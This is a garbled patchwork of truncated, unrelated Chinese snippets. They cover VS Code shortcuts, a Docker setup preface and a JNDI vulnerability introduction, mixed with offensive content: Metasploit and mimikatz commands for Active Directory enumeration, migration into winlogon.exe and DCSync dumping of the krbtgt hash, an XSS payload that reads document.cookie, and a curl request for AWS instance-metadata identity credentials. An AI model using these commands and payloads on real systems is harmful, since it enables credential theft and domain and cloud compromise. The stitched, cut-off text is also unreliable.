域内主机枚举 run windows/gather/enum_ad_computers 进程迁移 migrate winlogon.exe(id) lsadump::dcsync /domain:ack123.com /user:krbtgt 获取sid和hash lsadump::lsa /pat
0</option></select><img/src=xon=()onx+honerror=alert(1)>ss<svg/onload=prompt(document.cookie)%20>
全局 Command + Shift + P / F1 显示命令面板 Command + P 快速打开 Command + Shift + N 打开新窗口 Command + W 关闭窗口 基本 Command + X 剪切(未选中文本的情况下,剪切光标所在行) Command + C 复制(未选中
curl -s -f -H "X-aws-ec2-metadata-token:AQAEAAIlAL3PrSdAvVN6IaeSEYmxPBm0e6hmbe59RKClxgOXnaQaaw==" http://169.254.169.254/latest/meta-data/identity-cre
前言 首先,准备2台虚拟机,centos或者unbuntu即可 其次,做好各种心理准备,你可能会遇到各种各样让你崩溃但是又不知如何解决的问题,听我的,耐心点,一点点排查问题,很多答案现在网上并没有解决方案只能自己去摸索,原因就是因为国内现在对docker封杀了,你可能会下载不了一些镜像。 最后,还是
作为一个2年多前的漏洞,慢慢也开始替代shiro反序列化漏洞出现在各个攻防的场景,就该漏洞的后利用作出描述。 漏洞原理 JNDI 全称为:Java Naming and Directory Interface ,java命名和目录接口,刚开始我也始终不理解这个功能的含义,后面发现不必太过纠结于此,更
